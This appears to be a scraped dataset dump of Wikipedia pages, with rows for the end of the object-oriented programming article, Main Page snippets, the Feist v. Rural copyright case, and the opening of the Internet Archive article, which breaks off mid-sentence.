a paper about it was published in 1982. 17 In 1986, the Association for Computing Machinery organized the first Conference on Object-Oriented Programming, Systems, Languages, and Applications (OOPSLA), which was attended by 1,000 people. Among other developments was the Common Lisp Object System, which integrates functional programming and object-oriented programming and allows extension via a Meta-object protocol. In the 1980s, there were a few attempts to design processor architectures that included hardware support for objects in memory but these were not successful. Examples include the Intel iAPX 432 and the Linn Smart Rekursiv. In the mid 1980s Objective-C was developed by Brad Cox, who had used Smalltalk at ITT Inc.. Bjarne Stroustrup, who had used Simula for his PhD thesis, created the object-oriented C . 13 In 1985, Bertrand Meyer also produced the first design of the Eiffel language. Focused on software quality, Eiffel is a purely object-oriented programming language and a notation supporting the entire software lifecycle. Meyer described the Eiffel software development method, based on a small number of key ideas from software engineering and computer science, in Object-Oriented Software Construction. 18 Essential to the quality focus of Eiffel is Meyer's reliability mechanism, design by contract, which is an integral part of both the method and language. In the early and mid 1990s object-oriented programming developed as the dominant programming paradigm when programming languages supporting the techniques became widely available. These included Visual FoxPro 3.0, 19 20 21 C , 22 and Delphi citation needed . Its dominance was further enhanced by the rising popularity of graphical user interfaces, which rely heavily upon object-oriented programming techniques. An example of a closely related dynamic GUI library and OOP language can be found in the Cocoa frameworks on Mac OS X, written in Objective-C, an object-oriented, dynamic messaging extension to C based on Smalltalk. OOP toolkits also enhanced the popularity of event-driven programming (although this concept is not limited to OOP). At ETH Z rich, Niklaus Wirth and his colleagues investigated the concept of type checking across module boundaries. Modula 2 (1978) included this concept, and their succeeding design, Oberon (1987), included a distinctive approach to object orientation, classes, and such. Inheritance is not obvious in Wirth's design since his nomenclature looks in the opposite direction: It is called type extension and the viewpoint is from the parent down to the inheritor. Object-oriented features have been added to many previously existing languages, including Ada, BASIC, Fortran, Pascal, and COBOL. Adding these features to languages that were not initially designed for them often led to problems with compatibility and maintainability of code. More recently, some languages have emerged that are primarily object-oriented, but that are also compatible with procedural methodology. Two such languages are Python and Ruby. Probably the most commercially important recent object-oriented languages are Java, developed by Sun Microsystems, as well as C and Visual Basic.NET (VB.NET), both designed for Microsoft's .NET platform. Each of these two frameworks shows, in its way, the benefit of using OOP by creating an abstraction from implementation. VB.NET and C support cross-language inheritance, allowing classes defined in one language to subclass classes defined in the other language. Object-oriented programming uses objects, but not all of the associated techniques and structures are supported directly in languages that claim to support OOP. The features listed below are common among languages considered to be strongly class- and object-oriented (or multi-paradigm with OOP support), with notable exceptions mentioned. 23 24 25 26 Christopher J. Date stated that critical comparison of OOP to other technologies, relational in particular, is difficult because of lack of an agreed-upon and rigorous definition of OOP. 27 Modular programming support provides the ability to group procedures into files and modules for organizational purposes. Modules are namespaced so identifiers in one module will not conflict with a procedure or variable sharing the same name in another file or module. An object is a data structure or abstract data type containing fields (state variables containing data) and methods (subroutines or procedures defining the object's behavior in code). Fields may also be known as members, attributes, or properties. Objects are typically stored as contiguous regions of memory. Objects are accessed somewhat like variables with complex internal structures, and in many languages are effectively pointers, serving as actual references to a single instance of said object in memory within a heap or stack. Objects sometimes correspond to things found in the real world. 28 For example, a graphics program may have objects such as "circle", "square", and "menu". An online shopping system might have objects such as "shopping cart", "customer", and "product". Sometimes objects represent more abstract entities, like an object that represents an open file, or an object that provides the service of translating measurements from U.S. customary to metric. Objects can contain other objects in their instance variables; this is known as object composition. For example, an object in the Employee class might contain (either directly or through a pointer) an object in the Address class, in addition to its own instance variables like "first name" and "position". Object composition is used to represent "has-a" relationships: every employee has an address, so every Employee object has access to a place to store an Address object (either directly embedded within itself or at a separate location addressed via a pointer). Date and Darwen have proposed a theoretical foundation that uses OOP as a kind of customizable type system to support RDBMS, but it forbids object pointers. 29 The OOP paradigm has been criticized for overemphasizing the use of objects for software design and modeling at the expense of other important aspects (computation algorithms). 30 31 For example, Rob Pike has said that OOP languages frequently shift the focus from data structures and algorithms to types. 32 Steve Yegge noted that, as opposed to functional programming: 33 Object Oriented Programming puts the nouns first and foremost. Why would you go to such lengths to put one part of speech on a pedestal? Why should one kind of concept take precedence over another? It's not as if OOP has suddenly made verbs less important in the way we actually think. It's a strangely skewed perspective. Rich Hickey, creator of Clojure, described object systems as overly simplistic models of the real world. He emphasized the inability of OOP to model time properly, which is getting increasingly problematic as software systems become more concurrent. 31 Alexander Stepanov compares object orientation unfavourably to generic programming: 30 I find OOP technically unsound. It attempts to decompose the world in terms of interfaces that vary on a single type. To deal with the real problems you need multisorted algebras — families of interfaces that span multiple types. I find OOP philosophically unsound. It claims that everything is an object. Even if it is true it is not very interesting — saying that everything is an object is saying nothing at all. OOP languages are diverse, but typically OOP languages allow inheritance for code reuse and extensibility in the form of either classes or prototypes. These forms of inheritance are significantly different, but analogous terminology is used to define the concepts of object and instance. In class-based programming, the most popular style, each object is required to be an instance of a particular class. The class defines the data format or type (including member variables and their types) and available procedures (class methods or member functions) for a given type or class of object. Objects are created by calling a special type of method in the class known as a constructor. Classes may inherit from other classes, so they are arranged in a hierarchy that represents "is-a-type-of" relationships. For example, class Employee might inherit from class Person. All the data and methods available to the parent class also appear in the child class with the same names. For example, class Person might define variables "first name" and "last name" with method "make full name() . These will also be available in class Employee, which might add the variables "position" and "salary". It is guaranteed that all instances of class Employee will have the same variables, such as the name, position, and salary. Procedures and variables can be specific to either the class or the instance; this leads to the following terms: Depending on the definition of the language, subclasses may or may not be able to override the methods defined by superclasses. Multiple inheritance is allowed in some languages, though this can make resolving overrides complicated. Some languages have special support for other concepts like traits and mixins, though, in any language with multiple inheritance, a mixin is simply a class that does not represent an is-a-type-of relationship. Mixins are typically used to add the same methods to multiple classes. For example, class UnicodeConversionMixin might provide a method unicode to ascii() when included in class FileReader and class WebPageScraper, which do not share a common parent. Abstract classes cannot be instantiated into objects; they exist only for inheritance into other "concrete" classes that can be instantiated. In Java, the final keyword can be used to prevent a class from being subclassed. 34 In contrast, in prototype-based programming, objects are the primary entities. Generally, the concept of a "class" does not even exist. Rather, the prototype or parent of an object is just another object to which the object is linked. In Self, an object may have multiple or no parents, 35 but in the most popular prototype-based language, Javascript, every object has one prototype link (and only one). New objects can be created based on already existing objects chosen as their prototype. You may call two different objects apple and orange a fruit if the object fruit exists, and both apple and orange have fruit as their prototype. The idea of the fruit class does not exist explicitly, but can be modeled as the equivalence class of the objects sharing the same prototype, or as the set of objects satisfying a certain interface (duck typing). Unlike class-based programming, it is typically possible in prototype-based languages to define attributes and methods not shared with other objects; for example, the attribute sugar content may be defined in apple but not orange. Some languages like Go do not support inheritance at all. Go states that it is object-oriented, 36 and Bjarne Stroustrup, author of C , has stated that it is possible to do OOP without inheritance. 37 The doctrine of composition over inheritance advocates implementing has-a relationships using composition instead of inheritance. For example, instead of inheriting from class Person, class Employee could give each Employee object an internal Person object, which it then has the opportunity to hide from external code even if class Person has many public attributes or methods. Delegation is another language feature that can be used as an alternative to inheritance. Rob Pike has criticized the OO mindset for preferring a multilevel type hierarchy with layered abstractions to a three-line lookup table. 38 He has called object-oriented programming "the Roman numerals of computing". 39 Bob Martin states that because they are software, related classes do not necessarily share the relationships of the things they represent. 40 It is the responsibility of the object, not any external code, to select the procedural code to execute in response to a method call, typically by looking up the method at run time in a table associated with the object. This feature is known as dynamic dispatch. If the call variability relies on more than the single type of the object on which it is called (i.e. at least one other parameter object is involved in the method choice), one speaks of multiple dispatch. A method call is also known as message passing. It is conceptualized as a message (the name of the method and its input parameters) being passed to the object for dispatch. Dispatch interacts with inheritance; if a method is not present in a given object or class, the dispatch is delegated to its parent object or class, and so on, going up the chain of inheritance. Data abstraction is a design pattern in which data are visible only to semantically related functions, to prevent misuse. The success of data abstraction leads to frequent incorporation of data hiding as a design principle in object-oriented and pure functional programming. Similarly, encapsulation prevents external code from being concerned with the internal workings of an object. This facilitates code refactoring, for example allowing the author of the class to change how objects of that class represent their data internally without changing any external code (as long as "public" method calls work the same way). It also encourages programmers to put all the code that is concerned with a certain set of data in the same class, which organizes it for easy comprehension by other programmers. Encapsulation is a technique that encourages decoupling. In object oriented programming, objects provide a layer which can be used to separate internal from external code and implement abstraction and encapsulation. External code can only use an object by calling a specific instance method with a certain set of input parameters, reading an instance variable, or writing to an instance variable. A program may create many instances of objects as it runs, which operate independently. This technique, it is claimed, allows easy re-use of the same procedures and data definitions for different sets of data, in addition to potentially mirroring real-world relationships intuitively. Rather than utilizing database tables and programming subroutines, the developer utilizes objects the user may be more familiar with: objects from their application domain. 41 These claims that the OOP paradigm enhances reusability and modularity have been criticized. 42 43 If a class does not allow calling code to access internal object data and permits access through methods only, this is also a form of information hiding. Some languages (Java, for example) let classes enforce access restrictions explicitly, for example, denoting internal data with the private keyword and designating methods intended for use by code outside the class with the public keyword. 44 Methods may also be designed public, private, or intermediate levels such as protected (which allows access from the same class and its subclasses, but not objects of a different class). 44 In other languages (like Python) this is enforced only by convention (for example, private methods may have names that start with an underscore). In C , Swift Kotlin languages, internal keyword permits access only to files present in the same assembly, package, or module as that of the class. 45 In programming languages, particularly object-oriented ones, the emphasis on abstraction is vital. Object-oriented languages extend the notion of type to incorporate data abstraction, highlighting the significance of restricting access to internal data through methods. 46 Eric S. Raymond has written that object-oriented programming languages tend to encourage thickly layered programs that destroy transparency. 47 Raymond compares this unfavourably to the approach taken with Unix and the C programming language. 47 The "open closed principle" advocates that classes and functions "should be open for extension, but closed for modification". Luca Cardelli has claimed that OOP languages have "extremely poor modularity properties with respect to class extension and modification", and tend to be extremely complex. 42 The latter point is reiterated by Joe Armstrong, the principal inventor of Erlang, who is quoted as saying: 43 The problem with object-oriented languages is they've got all this implicit environment that they carry around with them. You wanted a banana but what you got was a gorilla holding the banana and the entire jungle. Leo Brodie has suggested a connection between the standalone nature of objects and a tendency to duplicate code 48 in violation of the don't repeat yourself principle 49 of software development. Subtyping a form of polymorphism is when calling code can be independent of which class in the supported hierarchy it is operating on the parent class or one of its descendants. Meanwhile, the same operation name among objects in an inheritance hierarchy may behave differently. For example, objects of the type Circle and Square are derived from a common class called Shape. The Draw function for each type of Shape implements what is necessary to draw itself while calling code can remain indifferent to the particular type of Shape being drawn. This is another type of abstraction that simplifies code external to the class hierarchy and enables strong separation of concerns. A common feature of objects is that methods are attached to them and can access and modify the object's data fields. In this brand of OOP, there is usually a special name such as this or self used to refer to the current object. In languages that support open recursion, object methods can call other methods on the same object (including themselves) using this name. This variable is late-bound; it allows a method defined in one class to invoke another method that is defined later, in some subclass thereof. Simula (1967) is generally accepted as being the first language with the primary features of an object-oriented language. It was created for making simulation programs, in which what came to be called objects were the most important information representation. Smalltalk (1972 to 1980) is another early example and the one with which much of the theory of OOP was developed. Concerning the degree of object orientation, the following distinctions can be made: Many widely used languages, such as C , Java, and Python, provide object-oriented features. Although in the past object-oriented programming was widely accepted, 51 more recently essays criticizing object-oriented programming and recommending the avoidance of these features (generally in favor of functional programming) have been very popular in the developer community. 52 Paul Graham has suggested that OOP's popularity within large companies is due to "large (and frequently changing) groups of mediocre programmers". According to Graham, the discipline imposed by OOP prevents any one programmer from "doing too much damage". 53 Eric S. Raymond, a Unix programmer and open-source software advocate, has been critical of claims that present object-oriented programming as the "One True Solution". 47 Richard Feldman argues that these languages may have improved their modularity by adding OO features, but they became popular for reasons other than being object-oriented. 54 In an article, Lawrence Krubner claimed that compared to other languages (LISP dialects, functional languages, etc.) OOP languages have no unique strengths, and inflict a heavy burden of unneeded complexity. 55 A study by Potok et al. has shown no significant difference in productivity between OOP and procedural approaches. 56 Luca Cardelli has claimed that OOP code is "intrinsically less efficient" than procedural code and that OOP can take longer to compile. 42 In recent years, object-oriented programming has become especially popular in dynamic programming languages. Python, PowerShell, Ruby and Groovy are dynamic languages built on OOP principles, while Perl and PHP have been adding object-oriented features since Perl 5 and PHP 4, and ColdFusion since version 6. The Document Object Model of HTML, XHTML, and XML documents on the Internet has bindings to the popular JavaScript ECMAScript language. JavaScript is perhaps the best known prototype-based programming language, which employs cloning from prototypes rather than inheriting from a class (contrast to class-based programming). Another scripting language that takes this approach is Lua. The messages that flow between computers to request services in a client-server environment can be designed as the linearizations of objects defined by class objects known to both the client and the server. For example, a simple linearized object would consist of a length field, a code point identifying the class, and a data value. A more complex example would be a command consisting of the length and code point of the command and values consisting of linearized objects representing the command's parameters. Each such command must be directed by the server to an object whose class (or superclass) recognizes the command and can provide the requested service. Clients and servers are best modeled as complex object-oriented structures. Distributed Data Management Architecture (DDM) took this approach and used class objects to define objects at four levels of a formal hierarchy: The initial version of DDM defined distributed file services. It was later extended to be the foundation of Distributed Relational Database Architecture (DRDA). One way to address challenges of object-oriented design is via design patterns which are solution patterns to commonly occurring problems in software design. Some of these commonly occurring problems have implications and solutions particular to object-oriented development. The following are notable software design patterns for OOP objects. 57 As an example of an object anti-pattern, the God object knows or does too much. It is intuitive to assume that inheritance creates a semantic "is a" relationship, and thus to infer that objects instantiated from subclasses can always be safely used instead of those instantiated from the superclass. This intuition is unfortunately false in most OOP languages, in particular in all those that allow mutable objects. Subtype polymorphism as enforced by the type checker in OOP languages (with mutable objects) cannot guarantee behavioral subtyping in any context. Behavioral subtyping is undecidable in general, so it cannot be implemented by a program (compiler). Class or object hierarchies must be carefully designed, considering possible incorrect uses that cannot be detected syntactically. This issue is known as the Liskov substitution principle. Design Patterns: Elements of Reusable Object-Oriented Software is an influential book published in 1994 by Erich Gamma, Richard Helm, Ralph Johnson, and John Vlissides, often referred to humorously as the "Gang of Four". Along with exploring the capabilities and pitfalls of object-oriented programming, it describes 23 common programming problems and patterns for solving them. The book describes the following patterns: Both object-oriented programming and relational database management systems (RDBMSs) are extremely common in software today update . Since relational databases do not store objects directly (though some RDBMSs have object-oriented features to approximate this), there is a general need to bridge the two worlds. The problem of bridging object-oriented programming accesses and data patterns with relational databases is known as object-relational impedance mismatch. There are some approaches to cope with this problem, but no general solution without downsides. 58 One of the most common approaches is object-relational mapping, as found in IDE languages such as Visual FoxPro and libraries such as Java Data Objects and Ruby on Rails' ActiveRecord. There are also object databases that can be used to replace RDBMSs, but these have not been as technically and commercially successful as RDBMSs. OOP can be used to associate real-world objects and processes with digital counterparts. However, not everyone agrees that OOP facilitates direct real-world mapping or that real-world mapping is even a worthy goal; Bertrand Meyer argues in Object-Oriented Software Construction that a program is not a model of the world but a model of some part of the world; "Reality is a cousin twice removed". 59 At the same time, some principal limitations of OOP have been noted. 60 For example, the circle-ellipse problem is difficult to handle using OOP's concept of inheritance. However, Niklaus Wirth (who popularized the adage now known as Wirth's law: "Software is getting slower more rapidly than hardware becomes faster") said of OOP in his paper, "Good Ideas through the Looking Glass", "This paradigm closely reflects the structure of systems in the real world and is therefore well suited to model complex systems with complex behavior" 61 (contrast KISS principle). Steve Yegge and others noted that natural languages lack the OOP approach of strictly prioritizing things (objects nouns) before actions (methods verbs). 62 This problem may cause OOP to suffer more convoluted solutions than procedural programming. 63 OOP was developed to increase the reusability and maintainability of source code. 64 Transparent representation of the control flow had no priority and was meant to be handled by a compiler. With the increasing relevance of parallel hardware and multithreaded coding, developing transparent control flow becomes more important, something hard to achieve with OOP. 65 66 67 68 Responsibility-driven design defines classes in terms of a contract, that is, a class should be defined around a responsibility and the information that it shares. This is contrasted by Wirfs-Brock and Wilkerson with data-driven design, where classes are defined around the data-structures that must be held. The authors hold that responsibility-driven design is preferable. SOLID is a mnemonic invented by Michael Feathers which spells out five software engineering design principles: GRASP (General Responsibility Assignment Software Patterns) is another set of guidelines advocated by Craig Larman. Objects are the run-time entities in an object-oriented system. They may represent a person, a place, a bank account, a table of data, or any item that the program has to handle. There have been several attempts at formalizing the concepts used in object-oriented programming. The following concepts and constructs have been used as interpretations of OOP concepts: Attempts to find a consensus definition or theory behind objects have not proven very successful (however, see Abadi Cardelli, A Theory of Objects 70 for formal definitions of many OOP concepts and constructs), and often diverge widely. For example, some definitions focus on mental activities, and some on program structuring. One of the simpler definitions is that OOP is the act of using "map" data structures or arrays that can contain functions and pointers to other maps, all with some syntactic and scoping sugar on top. Inheritance can be performed by cloning the maps (sometimes called "prototyping"). |
640 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Main_Page | On December 8, 1963, Pan Am Flight 214 crashed near Elkton, Maryland, killing all 81 crew and passengers. Flight 214 had originated at Isla Verde International Airport in San Juan, flying to Friendship Airport near Baltimore, and then took off for Philadelphia. The crash was Pan Am's first fatal accident with the Boeing 707 121, which it had introduced to its fleet five years earlier. An investigation by the Civil Aeronautics Board concluded that the probable cause of the crash was a lightning strike that had ignited fuel vapors in one of the aircraft's fuel tanks, causing an explosion that destroyed the left wing. The exact manner of ignition was never determined, but the investigation increased awareness of how lightning can damage aircraft, leading to new regulations. The crash also led to research into the safety of several types of aviation fuel and into ways of changing the design of aircraft fuel systems to make them safer in the event of lightning strikes. (Full article...) August 17 NGC 3324 is an open cluster in the southern constellation Carina, located northwest of the Carina Nebula at a distance of 9,100 ly (2,800 pc) from Earth. The two are often confused as a single object, and together have been nicknamed the "Gabriela Mistral Nebula" due to its resemblance to the Chilean poet. NGC 3324 was first catalogued by James Dunlop in 1826. This infrared photograph by NASA’s James Webb Space Telescope shows a young, star-forming region in the western section of NGC 3324 known as the "Cosmic Cliffs". Photograph credit: NASA Wikipedia is written by volunteer editors and hosted by the Wikimedia Foundation, a non-profit organization that also hosts a range of other volunteer projects: This Wikipedia is written in English. Many other Wikipedias are available; some of the largest are listed below. |
641 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Feist_Publications,_Inc.,_v._Rural_Telephone_Service_Co. | Feist Publications, Inc., v. Rural Telephone Service Co., 499 U.S. 340 (1991), was a landmark decision by the Supreme Court of the United States establishing that information alone without a minimum of original creativity cannot be protected by copyright. 1 In the case appealed, Feist had copied information from Rural's telephone listings to include in its own, after Rural had refused to license the information. Rural sued for copyright infringement. The Court ruled that information contained in Rural's phone directory was not copyrightable and that therefore no infringement existed. Rural Telephone Service Company, Inc. is a telephone cooperative providing services for areas in northwest Kansas, with headquarters in the small town of Lenora, in Norton County. The company was under a statutory obligation to compile and distribute a "white pages" phone directory of all its customers free of charge as a condition of its monopoly franchise. Feist Publications, Inc. specialized in compiling telephone directories from larger geographic areas than Rural from other areas of Kansas. It had licensed the directory of 11 other local directories, with Rural being the only holdout in the region. Despite Rural's denial of a license to Feist, Feist copied 4,000 entries from Rural's directory. Because Rural had placed a small number of phony entries to detect copying, Feist was caught. Before this case, the substance of copyright in United States law followed the sweat of the brow doctrine, which gave copyright to anyone who invested significant amount of time and energy into their work. At trial and appeal level the courts followed this doctrine, siding with Rural. The ruling of the court was written by Justice Sandra Day O'Connor. It examined the purpose of copyright and explained the standard of copyrightability as based on originality. The case centered on two well-established principles in United States copyright law: that facts are not copyrightable, and that compilations of facts can be. "There is an undeniable tension between these two propositions", O'Connor wrote in her opinion. "Many compilations consist of nothing but raw data—i.e. wholly factual information not accompanied by any original expression. On what basis may one claim a copyright upon such work? Common sense tells us that 100 uncopyrightable facts do not magically change their status when gathered together in one place. … The key to resolving the tension lies in understanding why facts are not copyrightable: The "Sine qua non of copyright is originality. Rural claimed a collection copyright in its directory. The court clarified that the intent of copyright law was not, as claimed by Rural and some lower courts, to reward the efforts of persons collecting information—the so-called "sweat of the brow" or "industrious collection" doctrine—but rather "to promote the Progress of Science and useful Arts" (U.S. Const. Art. I, 8, cl. 8)—that is, to encourage creative expression. The standard for creativity is extremely low. It need not be novel; it need only possess a "spark" or "minimal degree" of creativity to be protected by copyright. In regard to collections of facts, O'Connor wrote that copyright can apply only to the creative aspects of collection: the creative choice of what data to include or exclude, the order and style in which the information is presented, etc.—not to the information itself. If Feist were to take the directory and rearrange it, it would destroy the copyright owned in the data. "Notwithstanding a valid copyright, a subsequent compiler remains free to use the facts contained in another's publication to aid in preparing a competing work, so long as the competing work does not feature the same selection and arrangement", she wrote. The court held that Rural's directory was nothing more than an alphabetic list of all subscribers to its service, which it was required to compile under law, and that no creative expression was involved. That Rural spent considerable time and money collecting the data was irrelevant to copyright law, and Rural's copyright claim was dismissed. All the justices joined O'Connor's opinion except Harry Blackmun, who concurred only in judgment, but did not file a separate opinion. 2 The ruling has major implications for any project that serves as a collection of knowledge. Information (facts, discoveries, etc.) from any source is fair game, but cannot contain any of the "expressive" content added by the source author. That includes not only the author's own comments, but also their choice of which facts to cover, which links to make among the bits of information, the order of presentation (unless it is something obvious like alphabetical), evaluations of the quality of various pieces of information, or anything else that might be considered the author's "original creative work" rather than mere facts. For example, a recipe is a process, and not copyrightable, but the words used to describe it are; see idea-expression divide and Publications International v. Meredith Corp. (1996). 3 Therefore, a recipe can be rewritten with different wording and be published without infringing copyright. If an individual rewrote every recipe from a particular cookbook, they might be found to have infringed the author's copyright in the choice of recipes and their "coordination" and "presentation", even if they used different words, but the West decisions below suggest that this is unlikely unless there is some significant creativity carried over from the original presentation. A sufficiently novel, useful, and unique (i.e. non-obvious) recipe can be granted protection under patent law. 4 Feist proved most important in the area of copyright of legal case law publications. One might assume that the text of U.S. case law is in public domain, but Thomson West claimed a copyright as to the first-page citations and internal pinpoint page citations of its versions of court opinions (case law) found in its printed versions of the case law ("West's citation claims"). West also claimed a copyright in the text of its versions of the case law, which included parallel citations and typographical corrections ("West's text claims"). The text claim would have barred anyone from copying the text of a case from a West case law reporter, since the copied text would include West enhancements to which West claimed copyright. In a 1986 pre-Feist case, West's citation copyright claim was affirmed by the U.S. Court of Appeals for the Eighth Circuit in a preliminary injunction case brought by West against Mead Data, owner of Lexis (West v. Mead), 5 but in a case commenced in 1994 in the U.S. District Court for the Southern District of New York, the U.S. Court of Appeals for the Second Circuit found Feist to have undermined the reasoning in West v. Mead. West's citation claims were challenged in 1994 by legal publisher Matthew Bender Company and by a small CD-ROM publisher HyperLaw, Inc. HyperLaw intervened, joining Matthew Bender in the citation challenge and separately challenging West's text copyright claims. In 1998, the Second Circuit found that West did not have a protectable copyright interest in its first-page citations or its internal pagination citations (Matthew Bender v. West, Citation Appeal). 6 The Second Circuit thereby rejected a Minnesota district court's 1996 determination (Oasis Publishing Co. v. West Publishing Co., 924 F.Supp. 918, D. Minn.) that Feist does not change the outcome of West. In the same case, but in separate decisions in which Matthew Bender was not involved, HyperLaw successfully challenged West's text claims. Judge John S. Martin ruled HyperLaw's favor against West in the May 1996 U.S. District Court decision Matthew Bender v. West, No. 94 Civ. 0589, 1997 WL 266972 (S.D.N.Y. May 19, 1997), aff'd, 158 F. 3d 674 (2nd Cir. 1998), cert. denied sub. nom. West v. Hyperlaw, 526 U.S. 1154 (1999). 7 West lost to HyperLaw on appeal to the U.S. Court of Appeals for the Second Circuit and the U.S. Supreme Court denied certiorari. 8 After West v. Mead, Mead Data and Lexis were acquired by Reed Elsevier, a large English-Dutch based publisher. During Matthew Bender v. West, Reed Elsevier and Matthew Bender entered into a strategic relationship, culminating in Reed Elsevier's acquisition of Matthew Bender in 1998, just after the Second Circuit appeals were argued. Reed Elsevier was now on West's side and filed an amicus brief opposing HyperLaw and supporting West. Thus, though the name of the case might suggest that Matthew Bender challenged West on the text claim, by the middle of the case Matthew Bender was on West's side on the text issue. Reed Elsevier's support of West's claims to a copyright in text was consistent with the initiatives, discussed below, to sidestep Feist by implementing database protection, through legislation and treaties discussed below. Similarly, during the case, West was acquired by the Canadian-based international publisher the Thomson Corporation. Another case covering this area is Assessment Technologies v. Wiredata (2003), 9 in which the Seventh Circuit Court of Appeals ruled that a copyright holder in a compilation of public domain data cannot use that copyright to prevent others from using the underlying public domain data, but may only restrict the specific format of the compilation if that format is itself sufficiently creative. Assessment Technologies also held that it is a fair use of a copyrighted work to reverse engineer that work in order to gain access to uncopyrightable facts. Assessment Technologies also created new law, stating that it is a copyright misuse and an abuse of process to attempt to use a contract or license agreement based on one's copyright to protect uncopyrightable facts. In the late 1990s, Congress attempted to pass laws to protect collections of data, 10 but the measures failed. 11 By contrast, the European Union has a sui generis (specific to that type of work) intellectual property protection for collections of data. The applicability of copyright to phone directories has come up in several other countries. In Canada, the appeal-level case of Tele-Direct (Publications) Inc. v. American Business Information Inc. (1997) 76 C.P.R. (3d) 296 (F.C.A.) reached a similar result to Feist's. But the Supreme Court partially backed away from the originality doctrine in CCH Canadian Ltd. v. Law Society of Upper Canada. Under CCH Canadian, someone may assert protection in a database where the facts are themselves not copied from another source. For example, a person may assert protection in a collection of their own recipes, but may not assert protection in a database of facts about persons and their ancestry compiled from census records. In Australia, the Federal Court decision Desktop Marketing Systems v Telstra 12 followed the UK approach in Walter v Lane and ruled that copyright law did, in fact, follow the "sweat of the brow" doctrine. But Desktop v Telstra held, like CCH Canadian, that collections of facts must not be copied from other sources to be eligible for protection. In 2010, the Telstra decision was overturned by Justice Gordon in Telstra v Phone Directories, 13 following the decision of the High Court in IceTV v Nine Network. 14 In India, the Supreme Court case Eastern Book Company Ors vs D.B. Modak Anr (where the respondents had compiled CD-ROMs of Supreme Court rulings with text sourced from copyedited publications of them by Eastern Book Company, albeit with copyrightable headnotes and other original content removed) cited both Feist and CCH Canadian, establishing that a work needed to demonstrate labor or effort—but not only labor—in order to be an "original", copyrightable work. In this case, the Court held that the copy-edited text of public domain court documents did not "depict independent creation even a modicum of creativity. This ruling contrasted previous rulings such as Govindan v E.M. Gopalakrishna Kone and Burlington Home Shipping Pvt Ltd v Rajnish Chibber, which followed the British approach of skill and labor. Congress has been considering whether to implement a treaty negotiated at the World Trade Organization. Part of the Uruguay Round Agreement resulted in text that reads, in Part II, Section 1, Article 10: Compilations of data or other material, whether in machine readable or other form, which by reason of the selection or arrangement of their contents constitute intellectual creations shall be protected as such. Such protection, which shall not extend to the data or material itself, shall be without prejudice to any copyright subsisting in the data or material itself. The text mirrors that of Article 2(5) of the Berne Convention, which applies to "collections of literary or artistic works". This treaty provision is broadly in line with the United States Copyright Act and the Act's case law, which protects compilations of data whose "selection and arrangement" is sufficiently original. See 17 U.S.C. 101 ("compilation" as defined by the United States Copyright Act includes compilations of data). The standard for such originality is fairly low; for example, business listings have been found to meet this standard when deciding which companies should be listed and categorizing those companies required some kind of expert judgment. See Key Publ'ns, Inc. v. Chinatown Today Pub. Enters., 945 F.2d 509 (2d Cir. 1991) (applying Feist). As such, implementation of this treaty would not overrule Feist. |
642 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Internet_Archive | Internet Archive is an American nonprofit digital library website founded in 1996 by Brewster Kahle. 1 2 4 It provides free access to collections of digitized materials including websites, software applications, music, audiovisual, and print materials. The Archive also advocates for a free and open Internet. As of February 4, 2024 update , the Internet Archive held more than 44 million print materials, 10.6 million videos, 1 million software programs, 15 million audio files, 4.8 million images, 255,000 concerts, and over 835 billion web pages in its Wayback Machine. 5 Its mission is committing to provide "universal access to all knowledge". 5 The Internet Archive allows the public to upload and download digital material to its data cluster, but the bulk of its data is collected automatically by its web crawlers, which work to preserve as much of the public web as possible. Its web archive, the Wayback Machine, contains hundreds of billions of web captures. 6 7 The Archive also oversees numerous book digitization projects, collectively one of the world's largest book digitization efforts. Brewster Kahle founded the Archive in May 1996, around the same time that he began the for-profit web crawling company Alexa Internet. 8 9 The earliest known archived page on the site was saved on May 10, 1996, at 2:42 pm UTC (7:42 am PDT). By October of that year, the Internet Archive had begun to archive and preserve the World Wide Web in large amounts. 10 11 12 13 14 The archived content became more easily available to the general public in 2001, through the Wayback Machine. In late 1999, the Archive expanded its collections beyond the web archive, beginning with the Prelinger Archives. Now, the Internet Archive includes texts, audio, moving images, and software. It hosts a number of other projects: the NASA Images Archive, the contract crawling service Archive-It, and the wiki-editable library catalog and book information site Open Library. Soon after that, the Archive began working to provide specialized services relating to the information access needs of the print-disabled; publicly accessible books were made available in a protected Digital Accessible Information System (DAISY) format. 15 According to its website: 16 Most societies place importance on preserving artifacts of their culture and heritage. Without such artifacts, civilization has no memory and no mechanism to learn from its successes and failures. Our culture now produces more and more artifacts in digital form. The Archive's mission is to help preserve those artifacts and create an Internet library for researchers, historians, and scholars. In August 2012, the Archive announced 17 that it has added BitTorrent to its file download options for more than 1.3 million existing files, and all newly uploaded files. 18 19 This method is the fastest means of downloading media from the Archive, as files are served from two Archive data centers, in addition to other torrent clients which have downloaded and continue to serve the files. 18 20 On November 6, 2013, the Internet Archive's headquarters in San Francisco's Richmond District caught fire, 21 destroying equipment and damaging some nearby apartments. 22 According to the Archive, it lost a side-building housing one of 30 of its scanning centers; cameras, lights, and scanning equipment worth hundreds of thousands of dollars; and "maybe 20 boxes of books and film, some irreplaceable, most already digitized, and some replaceable". 23 The nonprofit Archive sought donations to cover the estimated $600,000 in damage. 24 An overhaul of the site was launched as beta in November 2014, and the legacy layout was removed in March 2016. 25 26 In November 2016, Kahle announced that the Internet Archive was building the Internet Archive of Canada, a copy of the Archive to be based somewhere in Canada. The announcement received widespread coverage due to the implication that the decision to build a backup archive in a foreign country was because of the upcoming presidency of Donald Trump. 27 28 29 Kahle was quoted as saying: On November 9th in America, we woke up to a new administration promising radical change. It was a firm reminder that institutions like ours, built for the long-term, need to design for change. For us, it means keeping our cultural materials safe, private and perpetually accessible. It means preparing for a Web that may face greater restrictions. It means serving patrons in a world in which government surveillance is not going away; indeed it looks like it will increase. Throughout history, libraries have fought against terrible violations of privacy—where people have been rounded up simply for what they read. At the Internet Archive, we are fighting to protect our readers' privacy in the digital world. 27 Beginning in 2017, OCLC and the Internet Archive have collaborated to make the Archive's records of digitized books available in WorldCat. 30 Since 2018, the Internet Archive visual arts residency, which is organized by Amir Saber Esfahani and Andrew McClintock, helps connect artists with the Archive's over 48 petabytes 31 of digitized materials. Over the course of the yearlong residency, visual artists create a body of work which culminates in an exhibition. The hope is to connect digital history with the arts and create something for future generations to appreciate online or off. 32 Previous artists in residence include Taravat Talepasand, Whitney Lynn, and Jenny Odell. 33 The Internet Archive acquires most materials from donations, 34 such as hundreds of thousands of 78 rpm discs from Boston Public Library in 2017, 